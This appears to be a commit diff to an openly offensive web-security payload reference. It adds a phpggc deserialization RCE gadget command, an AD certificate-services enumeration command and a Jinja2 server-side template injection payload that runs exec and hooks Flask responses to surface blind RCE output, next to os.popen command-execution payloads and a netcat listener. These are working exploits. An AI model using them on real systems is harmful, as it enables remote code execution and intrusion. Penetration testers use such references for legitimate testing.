Blind SSTI Jinja

Insecure Deserialization/PHP.md

@@ -133,6 +133,7 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
 
 ```powershell
 phpggc monolog/rce1 'phpinfo();' -s
+phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
 ```
 
 ## PHP Phar Deserialization

Methodology and Resources/Active Directory Attack.md

@@ -2225,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local
 * Find ADCS Server
   * `crackmapexec ldap domain.lab -u username -p password -M adcs`
   * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
-* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
+* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
 
 #### ESC1 - Misconfigured Certificate Templates
 

README.md

@@ -9,7 +9,7 @@ You can also contribute with a :beers: IRL, or using the sponsor button
 [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
 [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
 
-An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/.
+An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).
 
 <p align="center">
   <img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">

Server Side Template Injection/README.md

@@ -43,6 +43,7 @@
     - [Jinja2 - Read remote file](#jinja2---read-remote-file)
     - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
     - [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution)
+      - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
       - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
       - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
       - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
@@ -496,15 +497,30 @@ Listen for connection
 nc -lnvp 8000
 ```
 
+#### Jinja2 - Forcing output on blind RCE
+
+You can import Flask functions to return an output from the vulnerable page.
+
+```py
+{{
+x.__init__.__builtins__.exec("from flask import current_app, after_this_request
+@after_this_request
+def hook(*args, **kwargs):
+    from flask import make_response
+    r = make_response('Powned')
+    return r
+")
+}}
+```
+
+
 #### Exploit the SSTI by calling os.popen().read()
 
 These payloads are context-free, and do not require anything, except being in a jinja2 Template object:
 
 ```python
 {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
-
 {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
-
 {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
@@ -512,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet):
 
 ```python
 {{ cycler.__init__.__globals__.os.popen('id').read() }}
-
 {{ joiner.__init__.__globals__.os.popen('id').read() }}
-
 {{ namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
@@ -1092,3 +1106,4 @@ layout template:
 * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
 * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
 * [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
+* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)